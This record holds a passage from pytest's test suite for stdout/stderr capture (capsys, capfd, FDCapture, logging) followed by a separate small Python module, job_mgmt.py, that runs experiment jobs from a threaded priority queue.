"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == ExitCode.NO_TESTS_COLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, testdir):
testdir.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture:
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt,
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 errors*",
]
)
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"E * cannot use capfd and capsys at the same time",
"*test_two*",
"E * cannot use capsys and capfd at the same time",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, b"42")
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
@pytest.mark.parametrize("nl", ("\n", "\r\n", "\r"))
def test_cafd_preserves_newlines(self, capfd, nl):
print("test", end=nl)
out, err = capfd.readouterr()
assert out.endswith(nl)
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_capsysbinary(self, testdir):
p1 = testdir.makepyfile(
r"""
def test_hello(capsysbinary):
import sys
sys.stdout.buffer.write(b'hello')
# Some likely un-decodable bytes.
sys.stdout.buffer.write(b'\xfe\x98\x20')
sys.stdout.buffer.flush()
# Ensure writing in text mode still works and is captured.
# https://github.com/pytest-dev/pytest/issues/6871
print("world", flush=True)
out, err = capsysbinary.readouterr()
assert out == b'hello\xfe\x98\x20world\n'
assert err == b''
print("stdout after")
print("stderr after", file=sys.stderr)
"""
)
result = testdir.runpytest(str(p1), "-rA")
result.stdout.fnmatch_lines(
[
"*- Captured stdout call -*",
"stdout after",
"*- Captured stderr call -*",
"stderr after",
"*= 1 passed in *",
]
)
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, b'42')
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, testdir):
"""#14"""
p = testdir.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = testdir.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
result.stdout.no_fnmatch_line("*captured before*")
result.stdout.no_fnmatch_line("*captured after*")
if no_capture:
assert "test_normal executed" in result.stdout.str()
else:
result.stdout.no_fnmatch_line("*test_normal executed*")
def test_disabled_capture_fixture_twice(self, testdir: Testdir) -> None:
"""Test that an inner disabled() exit doesn't undo an outer disabled().
Issue #7148.
"""
testdir.makepyfile(
"""
def test_disabled(capfd):
print('captured before')
with capfd.disabled():
print('while capture is disabled 1')
with capfd.disabled():
print('while capture is disabled 2')
print('while capture is disabled 1 after')
print('captured after')
assert capfd.readouterr() == ('captured before\\ncaptured after\\n', '')
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
[
"*while capture is disabled 1",
"*while capture is disabled 2",
"*while capture is disabled 1 after",
],
consecutive=True,
)
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""Ensure that capsys and capfd can be used by other fixtures during
setup and teardown."""
testdir.makepyfile(
"""\
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
result.stdout.no_fnmatch_line("*stdout contents begin*")
result.stdout.no_fnmatch_line("*stderr contents begin*")
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
testdir.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = testdir.runpytest("--capture=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(
r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = testdir.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO:
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
class TestTeeCaptureIO(TestCaptureIO):
def test_text(self):
sio = io.StringIO()
f = capture.TeeCaptureIO(sio)
f.write("hello")
s1 = f.getvalue()
assert s1 == "hello"
s2 = sio.getvalue()
assert s2 == s1
f.close()
sio.close()
def test_unicode_and_str_mixture(self):
sio = io.StringIO()
f = capture.TeeCaptureIO(sio)
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert f.buffer is f
assert not f.isatty()
pytest.raises(OSError, f.read)
pytest.raises(OSError, f.readlines)
iter_f = iter(f)
pytest.raises(OSError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
def test_captureresult() -> None:
cr = CaptureResult("out", "err")
assert len(cr) == 2
assert cr.out == "out"
assert cr.err == "err"
out, err = cr
assert out == "out"
assert err == "err"
assert cr[0] == "out"
assert cr[1] == "err"
assert cr == cr
assert cr == CaptureResult("out", "err")
assert cr != CaptureResult("wrong", "err")
assert cr == ("out", "err")
assert cr != ("out", "wrong")
assert hash(cr) == hash(CaptureResult("out", "err"))
assert hash(cr) == hash(("out", "err"))
assert hash(cr) != hash(("out", "wrong"))
assert cr < ("z",)
assert cr < ("z", "b")
assert cr < ("z", "b", "c")
assert cr.count("err") == 1
assert cr.count("wrong") == 0
assert cr.index("err") == 1
with pytest.raises(ValueError):
assert cr.index("wrong") == 0
assert next(iter(cr)) == "out"
assert cr._replace(err="replaced") == ("out", "replaced")
@pytest.fixture
def tmpfile(testdir) -> Generator[BinaryIO, None, None]:
f = testdir.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
# about UnicodeDecodeError, see note on pytester
pytest.skip(f"could not run 'lsof' ({exc!r})")
yield
out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture:
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
pytest.raises(AssertionError, cap.snap)
cap.done()
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(AssertionError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile):
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2.decode("ascii"))
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AssertionError, cap.suspend)
assert repr(cap) == (
"<FDCapture 1 oldfd={} _state='done' tmpfile={!r}>".format(
cap.targetfd_save, cap.tmpfile
)
)
# Should not crash with missing "_old".
assert repr(cap.syscapture) == (
"<SysCapture stdout _old=<UNSET> _state='done' tmpfile={!r}>".format(
cap.syscapture.tmpfile
)
)
def test_capfd_sys_stdout_mode(self, capfd):
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture:
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hxąć")
out, err = cap.readouterr()
assert out == "hxąć\n"
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(OSError, sys.stdin.read)
class TestTeeStdCapture(TestStdCapture):
captureclass = staticmethod(TeeStdCapture)
def test_capturing_error_recursive(self):
r"""For TeeStdCapture since we passthrough stderr/stdout, cap1
should get all output, while cap2 should only get "cap2\n"."""
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\ncap2\n"
assert out2 == "cap2\n"
class TestStdCaptureFD(TestStdCapture):
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile(
"""\
import os
def test_x():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.start_capturing()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile(
"""
import os
from fnmatch import fnmatch
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(
in_=capture.FDCapture(0) if in_ else None,
out=capture.FDCapture(1) if out else None,
err=capture.FDCapture(2) if err else None,
)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert fnmatch(repr(cap.out), "<FDCapture 1 oldfd=* _state='initialized' tmpfile=*>")
cap.start_capturing()
os.write(1, b"stdout")
assert cap.readouterr() == ("stdout", "")
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert fnmatch(repr(cap.err), "<FDCapture 2 oldfd=* _state='initialized' tmpfile=*>")
cap.start_capturing()
os.write(2, b"stderr")
assert cap.readouterr() == ("", "stderr")
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
assert fnmatch(repr(cap.in_), "<FDCapture 0 oldfd=* _state='initialized' tmpfile=*>")
cap.stop_capturing()
"""
)
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_fdcapture_invalid_fd_with_fd_reuse(self, testdir):
with saved_fd(1):
os.close(1)
cap = capture.FDCaptureBinary(1)
cap.start()
os.write(1, b"started")
cap.suspend()
os.write(1, b" suspended")
cap.resume()
os.write(1, b" resumed")
assert cap.snap() == b"started resumed"
cap.done()
with pytest.raises(OSError):
os.write(1, b"done")
def test_fdcapture_invalid_fd_without_fd_reuse(self, testdir):
with saved_fd(1), saved_fd(2):
os.close(1)
os.close(2)
cap = capture.FDCaptureBinary(2)
cap.start()
os.write(2, b"started")
cap.suspend()
os.write(2, b" suspended")
cap.resume()
os.write(2, b" resumed")
assert cap.snap() == b"started resumed"
cap.done()
with pytest.raises(OSError):
os.write(2, b"done")
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
def test_fdcapture_tmpfile_remains_the_same() -> None:
cap = StdCaptureFD(out=False, err=True)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
def test_close_and_capture_again(testdir):
testdir.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize(
"method", ["SysCapture(2)", "SysCapture(2, tee=True)", "FDCapture(2)"]
)
def test_capturing_and_logging_fundamentals(testdir, method: str) -> None:
# here we check a fundamental feature
p = testdir.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(
in_=None,
out=None,
err=capture.%s,
)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
result = testdir.runpython(p)
result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "replace"
assert sys.stderr.errors == "replace"
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win"), reason="only on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams() -> None:
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream:
def write(self, s):
pass
stream = cast(TextIO, DummyStream())
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
p = testdir.makepyfile(
"""
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
# Do not consider plugins like hypothesis, which might output to stderr.
testdir.monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
result = testdir.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
result.stdout.no_fnmatch_line("*OSError*")
def test_global_capture_with_live_logging(testdir):
# Issue 3819
# capture should work with live cli logging
# Teardown report seems to have the capture for the whole process (setup, capture, teardown)
testdir.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
testdir.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
# Issue 3819
# capture should work with live cli logging
testdir.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
"""It should behave the same with and without output capturing (#4861)."""
p = testdir.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = testdir.runpytest("-s", str(p))
result_with_capture = testdir.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
out = result_with_capture.stdout.str()
assert ("TypeError: write() argument must be str, not bytes" in out) or (
"TypeError: unicode argument expected, got 'bytes'" in out
)
def test_stderr_write_returns_len(capsys):
"""Write on Encoded files, namely captured stderr, should return number of characters written."""
assert sys.stderr.write("Foo") == 3
def test_encodedfile_writelines(tmpfile: BinaryIO) -> None:
ef = capture.EncodedFile(tmpfile, encoding="utf-8")
with pytest.raises(TypeError):
ef.writelines([b"line1", b"line2"])
assert ef.writelines(["line3", "line4"]) is None # type: ignore[func-returns-value]
ef.flush()
tmpfile.seek(0)
assert tmpfile.read() == b"line3line4"
tmpfile.close()
with pytest.raises(ValueError):
ef.read()
def test__get_multicapture() -> None:
assert isinstance(_get_multicapture("no"), MultiCapture)
pytest.raises(ValueError, _get_multicapture, "unknown").match(
r"^unknown capturing method: 'unknown'"
)
def test_logging_while_collecting(testdir):
"""Issue #6240: Calls to logging.xxx() during collection causes all logging calls to be duplicated to stderr"""
p = testdir.makepyfile(
"""\
import logging
logging.warning("during collection")
def test_logging():
logging.warning("during call")
assert False
"""
)
result = testdir.runpytest_subprocess(p)
assert result.ret == ExitCode.TESTS_FAILED
result.stdout.fnmatch_lines(
[
"*test_*.py F*",
"====* FAILURES *====",
"____*____",
"*--- Captured log call*",
"WARNING * during call",
"*1 failed*",
]
)
result.stdout.no_fnmatch_line("*Captured stderr call*")
result.stdout.no_fnmatch_line("*during collection*")
|
job_mgmt.py
|
from core_tools.job_mgnt.job_meta import job_meta
from dataclasses import dataclass, field
from typing import Any
import time
import threading, queue
from queue import PriorityQueue
@dataclass(order=True)
class ExperimentJob:
priority: float
job: Any = field(compare=False)
def kill(self):
self.job.KILL = True
class job_wrapper_helper(metaclass=job_meta):
def __init__(self, function, *args, **kwargs):
self.func = function
self.args = args
self.kwargs = kwargs
def run(self):
return self.func(*self.args, **self.kwargs)
def job_wrapper(func):
'''
wrapper that can turn any function into a job.
'''
def wrap(*args, **kwargs):
# j = job_wrapper_helper(func, *args, **kwargs)
# queue = queue_mgr()
# queue.put(ExperimentJob(1, job = j))
func(*args, **kwargs)
return wrap
class queue_mgr():
__instance = None
__init = False
q = None
job_refs = []
def __new__(cls):
if queue_mgr.__instance is None:
queue_mgr.__instance = object.__new__(cls)
return queue_mgr.__instance
def __init__(self):
if self.__init == False:
print('initializing')
self.q = PriorityQueue()
self.job_refs = list()
def worker():
while True:
n_jobs = self.q.qsize()
if n_jobs != 0:
print('{} items queued.'.format(n_jobs))
print('Starting new job.')
job_object = self.q.get()
try:
print(job_object.job.KILL)
if job_object.job.KILL != True:
job_object.job.run()
except Exception as e:
print('an exception in the job occurred? Going to the next job.')
print(e)
self.q.task_done()
else:
# 200ms sleep.
time.sleep(0.2)
self.worker_thread = threading.Thread(target=worker, daemon=True).start()
self.__init = True
def put(self, job):
'''
put a job into the measurement queue
Args:
job (ExperimentJob) : job object
'''
self.q.put(job)
self.job_refs.append(job)
def kill(self, job):
'''
kill a certain job that has been submitted to the queue
Args:
job (ExperimentJob) : job object
'''
job.KILL = True
def killall(self):
'''
kill all the jobs
'''
for job in self.job_refs:
job.kill()
self.job_refs = []
def join(self):
self.q.join()
@property
def n_jobs(self):
return self.q.qsize()
